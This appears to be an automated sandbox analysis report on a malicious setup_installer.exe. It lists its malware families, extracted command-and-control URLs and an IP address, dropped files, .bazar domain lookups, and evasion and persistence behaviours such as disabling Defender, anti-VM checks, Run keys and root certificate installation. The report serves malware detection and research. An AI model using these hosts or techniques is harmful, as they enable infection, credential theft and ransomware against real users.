amadey | b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3

Resubmissions

28-10-2021 15:53

211028-tbqhfabhb2 10

28-10-2021 05:27

211028-f5paksheak 10

27-10-2021 14:29

211027-rt28vafah7 10

Analysis

max time kernel
111s
max time network
1810s
submitted
01-01-1970 00:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_installer.exe
Size

4.6MB
MD5

b356bccf8b9aff2897ecc42970367f44
SHA1

fe06861ac4952834ddc290dd5e0e7f36c8adc018
SHA256

b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
SHA512

7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7

Score

10^/10

amadey djvu redline smokeloader socelars vidar media26 aspackv2 backdoor discovery evasion infostealer persistence ransomware spyware stealer trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

redline

Botnet

media26

91.121.67.60:23325

Extracted

Family

smokeloader

Version

2020

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6868	3560	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6136	3560	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9768	3560	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8304	3560	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
behavioral7/memory/2208-279-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral7/memory/2208-280-0x0000000000418D26-mapping.dmp	family_redline
behavioral7/memory/4492-341-0x0000000000418D32-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09db0d52c38.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09db0d52c38.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral7/memory/4448-534-0x0000000002EE0000-0x0000000002FB6000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS823188E5\libcurlpp.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS823188E5\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\libstdc++-6.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS823188E5\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS823188E5\libstdc++-6.dll	aspack_v212_v242

Blocklisted process makes network request 1 IoCs

Processes:

schtasks.exe

flow pid process

315 6140 schtasks.exe
Downloads MZ/PE file

flow	pid	process
315	6140	schtasks.exe

Executes dropped EXE 64 IoCs

Processes:

setup_install.exeWed09f257bb7877d00b2.exeWed0901eb1dae126e32.exeWed09d8d6edfaff2ac.exeWed0971f17486f8.exeWed096a1bff61.exeWed09b3a5ca1a712d390.exeWed09db0d52c38.exeWed094c47c32b.exeWed09e95ff6b5.exeWed09cfb2f9758281d8.exeWed09c42cad92c20f79.exeWed09d27135e5a8b3b.exeWed09b2a8bc4f16cb.exeWed09abf83d9c2.exeWed09977fdc12334.exeApplicationFrameHost.exeWed09abf83d9c2.exeWed09d27135e5a8b3b.exeWed09d27135e5a8b3b.tmpLzmwAqmV.exeWed0901eb1dae126e32.exeWed0971f17486f8.exeBCleanSoft82.exeinst1.exeWed0901eb1dae126e32.exeSoft1WW02.exe4.exe5.exeXYB0bVL96aEKhA.exEpostback.exesearch_hyperfs_206.exesetup.exewangting-game.exeWed0901eb1dae126e32.exeCalculator Installation.exe10.exeChrome5.exeyv_WxKr3KFtEgviNW6XER0DN.exevIbhD0SVFqEXOPaAylTpMO12.exerun.exe8696598.exerun2.exe2088911.exe20751.exeLzmwAqmV.exe4657985.exekPBhgOaGQk.exel52IOPxC8IZszZcHKSzkolDA.exerB8pSJCQHjIxwe2pFQq4cLX7.exeyU9A50kXOGuIyzhRuVL5irvz.exeheLdzdnLl5q5AkvLGStJu8xP.exeiDy7r92AdHoe594PiOA4dmf8.exeIlfe8Jb1D8sjzZ1u9umT7mRG.exeBmtIrsZ3_c0yIULXQeeVdv2X.exeWJ4Jp9BzJkMkcxTsUZxDV8_F.exe2471790.exesGQhoH2XC61E44HNJvyPCldu.exe8149190.exelFbCRQRRm6pas_s2WMj7t8O3.exe7433237.exe7903763.exeHbnZcEkba_UqabLoS_3sKPqH.exe6619578.exe

pid	process
2320	setup_install.exe
1276	Wed09f257bb7877d00b2.exe
1148	Wed0901eb1dae126e32.exe
4028	Wed09d8d6edfaff2ac.exe
2308	Wed0971f17486f8.exe
2008	Wed096a1bff61.exe
2164	Wed09b3a5ca1a712d390.exe
3952	Wed09db0d52c38.exe
3452	Wed094c47c32b.exe
2840	Wed09e95ff6b5.exe
3324	Wed09cfb2f9758281d8.exe
3736	Wed09c42cad92c20f79.exe
2160	Wed09d27135e5a8b3b.exe
2576	Wed09b2a8bc4f16cb.exe
3200	Wed09abf83d9c2.exe
1772	Wed09977fdc12334.exe
2728	ApplicationFrameHost.exe
3424	Wed09abf83d9c2.exe
3724	Wed09d27135e5a8b3b.exe
1800	Wed09d27135e5a8b3b.tmp
932	LzmwAqmV.exe
1892	Wed0901eb1dae126e32.exe
2208	Wed0971f17486f8.exe
4180	BCleanSoft82.exe
4300	inst1.exe
2108	Wed0901eb1dae126e32.exe
4448	Soft1WW02.exe
4508	4.exe
4604	5.exe
4616	XYB0bVL96aEKhA.exE
4676	postback.exe
4752	search_hyperfs_206.exe
4864	setup.exe
4936	wangting-game.exe
4492	Wed0901eb1dae126e32.exe
5032	Calculator Installation.exe
4248	10.exe
4420	Chrome5.exe
5076	yv_WxKr3KFtEgviNW6XER0DN.exe
776	vIbhD0SVFqEXOPaAylTpMO12.exe
2000	run.exe
4252	8696598.exe
1656	run2.exe
4464	2088911.exe
2896	20751.exe
3012	LzmwAqmV.exe
4528	4657985.exe
5356	kPBhgOaGQk.exe
5444	l52IOPxC8IZszZcHKSzkolDA.exe
5452	rB8pSJCQHjIxwe2pFQq4cLX7.exe
5460	yU9A50kXOGuIyzhRuVL5irvz.exe
5480	heLdzdnLl5q5AkvLGStJu8xP.exe
5488	iDy7r92AdHoe594PiOA4dmf8.exe
5500	Ilfe8Jb1D8sjzZ1u9umT7mRG.exe
5508	BmtIrsZ3_c0yIULXQeeVdv2X.exe
5516	WJ4Jp9BzJkMkcxTsUZxDV8_F.exe
5600	2471790.exe
5612	sGQhoH2XC61E44HNJvyPCldu.exe
5644	8149190.exe
5656	lFbCRQRRm6pas_s2WMj7t8O3.exe
5680	7433237.exe
5724	7903763.exe
5736	HbnZcEkba_UqabLoS_3sKPqH.exe
5756	6619578.exe

Tries to connect to .bazar domain 64 IoCs

Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.

Processes:

flow	ioc
1524	tuedwyyw.bazar
1603	iqemekyw.bazar
1677	bielwyem.bazar
1956	ehonuhyw.bazar
2818	agibekem.bazar
2765	ydywidyw.bazar
1477	ehcaekem.bazar
1607	iqemekyw.bazar
2164	huudekom.bazar
2189	ypwyuhed.bazar
2291	ehemeked.bazar
2356	lieluhem.bazar
2457	agywuhom.bazar
1557	fuqeidem.bazar
1801	agcuwyyw.bazar
2274	uconuhom.bazar
2337	fuacided.bazar
2551	izeduhem.bazar
2894	ufemwyed.bazar
1982	tusouhed.bazar
1995	tusouhed.bazar
2211	izibidom.bazar
2498	huwyidem.bazar
2533	vuibekyw.bazar
2553	etqeekom.bazar
2639	tuacekem.bazar
1537	tuedwyyw.bazar
1900	etibidyw.bazar
1902	etibidyw.bazar
2470	agywuhom.bazar
2876	yponidem.bazar
2717	aqomekyw.bazar
1474	ehcaekem.bazar
1478	ehcaekem.bazar
1856	ypudekyw.bazar
1987	tusouhed.bazar
2476	exudwyyw.bazar
2484	exudwyyw.bazar
2627	tyuhuhyw.bazar
2041	iqelwyed.bazar
2176	huudekom.bazar
2281	ehemeked.bazar
2396	aqtowyem.bazar
2459	agywuhom.bazar
2485	exudwyyw.bazar
2834	vueduhed.bazar
1485	ehcaekem.bazar
2221	izibidom.bazar
2226	etedwyed.bazar
2820	agibekem.bazar
2849	izqewyyw.bazar
1665	owacidyw.bazar
1770	huomuhed.bazar
2016	aqacidom.bazar
2149	vuywuhem.bazar
2647	eheluhom.bazar
2681	iqewidem.bazar
2833	vueduhed.bazar
1880	uccaeked.bazar
2251	tyqeekem.bazar
2275	uconuhom.bazar
2548	izeduhem.bazar
2596	ucemwyem.bazar
2617	tyuhuhyw.bazar

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

UBmFHZ8mX1WA__gGTDlJaqG8.exeWJ4Jp9BzJkMkcxTsUZxDV8_F.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UBmFHZ8mX1WA__gGTDlJaqG8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UBmFHZ8mX1WA__gGTDlJaqG8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WJ4Jp9BzJkMkcxTsUZxDV8_F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WJ4Jp9BzJkMkcxTsUZxDV8_F.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Wed09d8d6edfaff2ac.exeWed09977fdc12334.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Wed09d8d6edfaff2ac.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Wed09977fdc12334.exe

Loads dropped DLL 14 IoCs

Processes:

setup_install.exeApplicationFrameHost.exeWed09d27135e5a8b3b.tmpCalculator Installation.exemsiexec.exe

pid	process
2320	setup_install.exe
2320	setup_install.exe
2320	setup_install.exe
2320	setup_install.exe
2320	setup_install.exe
2320	setup_install.exe
2728	ApplicationFrameHost.exe
1800	Wed09d27135e5a8b3b.tmp
5032	Calculator Installation.exe
5032	Calculator Installation.exe
5032	Calculator Installation.exe
5032	Calculator Installation.exe
5032	Calculator Installation.exe
6692	msiexec.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

5080 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
5080	icacls.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

7433237.exePU6N0UzgOFQoL73yAS3u09iD.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	7433237.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	PU6N0UzgOFQoL73yAS3u09iD.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	PU6N0UzgOFQoL73yAS3u09iD.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

WJ4Jp9BzJkMkcxTsUZxDV8_F.exeUBmFHZ8mX1WA__gGTDlJaqG8.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WJ4Jp9BzJkMkcxTsUZxDV8_F.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UBmFHZ8mX1WA__gGTDlJaqG8.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
262	freegeoip.app
57	ipinfo.io
60	ipinfo.io
811	api.2ip.ua
273	ipinfo.io
12	ip-api.com
58	ipinfo.io
272	ipinfo.io
275	freegeoip.app
373	ipinfo.io
810	api.2ip.ua
833	api.2ip.ua
254	freegeoip.app
264	freegeoip.app
274	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

WJ4Jp9BzJkMkcxTsUZxDV8_F.exeUBmFHZ8mX1WA__gGTDlJaqG8.exe

pid process

5516 WJ4Jp9BzJkMkcxTsUZxDV8_F.exe
5092 UBmFHZ8mX1WA__gGTDlJaqG8.exe

pid	process
5516	WJ4Jp9BzJkMkcxTsUZxDV8_F.exe
5092	UBmFHZ8mX1WA__gGTDlJaqG8.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

Wed0971f17486f8.exeWed0901eb1dae126e32.exeiDy7r92AdHoe594PiOA4dmf8.exe4xggSC5Dk2sgR5wUwIkMzBkH.exerun.exe8149190.exeYNXyHeWxDpD4uopZucOe1_lx.exeIlfe8Jb1D8sjzZ1u9umT7mRG.exe39P_8p3e0thz0YWGHuCJsZ4x.exemstsc.exeschtasks.exe

description	pid	process	target process
PID 2308 set thread context of 2208	2308	Wed0971f17486f8.exe	Wed0971f17486f8.exe
PID 1148 set thread context of 4492	1148	Wed0901eb1dae126e32.exe	Wed0901eb1dae126e32.exe
PID 5488 set thread context of 1584	5488	iDy7r92AdHoe594PiOA4dmf8.exe	Explorer.EXE
PID 5384 set thread context of 1584	5384	4xggSC5Dk2sgR5wUwIkMzBkH.exe	Explorer.EXE
PID 2000 set thread context of 6196	2000	run.exe	AppLaunch.exe
PID 5644 set thread context of 6576	5644	8149190.exe	AppLaunch.exe
PID 5420 set thread context of 6616	5420	YNXyHeWxDpD4uopZucOe1_lx.exe	AppLaunch.exe
PID 5500 set thread context of 3716	5500	Ilfe8Jb1D8sjzZ1u9umT7mRG.exe	Ilfe8Jb1D8sjzZ1u9umT7mRG.exe
PID 2812 set thread context of 5952	2812	39P_8p3e0thz0YWGHuCJsZ4x.exe	39P_8p3e0thz0YWGHuCJsZ4x.exe
PID 4628 set thread context of 1584	4628	mstsc.exe	Explorer.EXE
PID 6140 set thread context of 6556	6140	schtasks.exe	qT9_LIOsJLOifDjajDL0jL3D.exe

autoit_exe 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09e95ff6b5.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09e95ff6b5.exe	autoit_exe

Drops file in Program Files directory 13 IoCs

Processes:

lFbCRQRRm6pas_s2WMj7t8O3.exeBmtIrsZ3_c0yIULXQeeVdv2X.exerB8pSJCQHjIxwe2pFQq4cLX7.exejg1_1faf.exeWed09d27135e5a8b3b.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	lFbCRQRRm6pas_s2WMj7t8O3.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	lFbCRQRRm6pas_s2WMj7t8O3.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	BmtIrsZ3_c0yIULXQeeVdv2X.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	rB8pSJCQHjIxwe2pFQq4cLX7.exe
File created	C:\Program Files (x86)\Company\NewProduct\d	jg1_1faf.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d	jg1_1faf.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Wed09d27135e5a8b3b.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-RGCQD.tmp	Wed09d27135e5a8b3b.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	lFbCRQRRm6pas_s2WMj7t8O3.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	BmtIrsZ3_c0yIULXQeeVdv2X.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	rB8pSJCQHjIxwe2pFQq4cLX7.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Wed09d27135e5a8b3b.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	lFbCRQRRm6pas_s2WMj7t8O3.exe

Drops file in Windows directory 1 IoCs

Processes:

Explorer.EXE

description ioc process

File created C:\Windows\rescache\_merged\3720402701\2274612954.pri Explorer.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Explorer.EXE

Program crash 19 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4948	3324	WerFault.exe	Wed09cfb2f9758281d8.exe
5404	4248	WerFault.exe	10.exe
5776	3324	WerFault.exe	Wed09cfb2f9758281d8.exe
6048	4604	WerFault.exe	5.exe
6124	3324	WerFault.exe	Wed09cfb2f9758281d8.exe
6180	4864	WerFault.exe	setup.exe
6652	3324	WerFault.exe	Wed09cfb2f9758281d8.exe
6680	4864	WerFault.exe	setup.exe
7012	5480	WerFault.exe	heLdzdnLl5q5AkvLGStJu8xP.exe
4412	5736	WerFault.exe	HbnZcEkba_UqabLoS_3sKPqH.exe
3288	5480	WerFault.exe	heLdzdnLl5q5AkvLGStJu8xP.exe
5224	5736	WerFault.exe	HbnZcEkba_UqabLoS_3sKPqH.exe
6912	5480	WerFault.exe	heLdzdnLl5q5AkvLGStJu8xP.exe
5256	5736	WerFault.exe	HbnZcEkba_UqabLoS_3sKPqH.exe
6220	5480	WerFault.exe	heLdzdnLl5q5AkvLGStJu8xP.exe
5524	5736	WerFault.exe	HbnZcEkba_UqabLoS_3sKPqH.exe
4828	3324	WerFault.exe	Wed09cfb2f9758281d8.exe
5504	3324	WerFault.exe	Wed09cfb2f9758281d8.exe
6292	4864	WerFault.exe	setup.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Wed09b2a8bc4f16cb.exe39P_8p3e0thz0YWGHuCJsZ4x.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed09b2a8bc4f16cb.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed09b2a8bc4f16cb.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed09b2a8bc4f16cb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	39P_8p3e0thz0YWGHuCJsZ4x.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	39P_8p3e0thz0YWGHuCJsZ4x.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	39P_8p3e0thz0YWGHuCJsZ4x.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6140 schtasks.exe
9412 schtasks.exe
4656 schtasks.exe
2448 schtasks.exe
5716 schtasks.exe
5676 schtasks.exe
7100 schtasks.exe
8340 schtasks.exe
Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

9044 timeout.exe
4136 timeout.exe
5844 timeout.exe
9988 timeout.exe
10148 timeout.exe

pid	process
6140	schtasks.exe
9412	schtasks.exe
4656	schtasks.exe
2448	schtasks.exe
5716	schtasks.exe
5676	schtasks.exe
7100	schtasks.exe
8340	schtasks.exe

pid	process
9044	timeout.exe
4136	timeout.exe
5844	timeout.exe
9988	timeout.exe
10148	timeout.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
9472	taskkill.exe
300	taskkill.exe
7060	taskkill.exe
6868	taskkill.exe
10020	taskkill.exe
9948	taskkill.exe
4812	taskkill.exe
7488	taskkill.exe
4388	taskkill.exe
7220	taskkill.exe
9528	taskkill.exe
10208	taskkill.exe
1944	taskkill.exe
6448	taskkill.exe

Modifies registry class 4 IoCs

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen	Explorer.EXE

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Wed09db0d52c38.exeWed09d8d6edfaff2ac.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Wed09db0d52c38.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Wed09db0d52c38.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Wed09d8d6edfaff2ac.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6362000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60b000000010000001a0000004900530052004700200052006f006f0074002000580031000000090000000100000016000000301406082b0601050507030206082b0601050507030114000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e1d000000010000001000000073b6876195f5d18e048510422aef04e3030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e820000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd038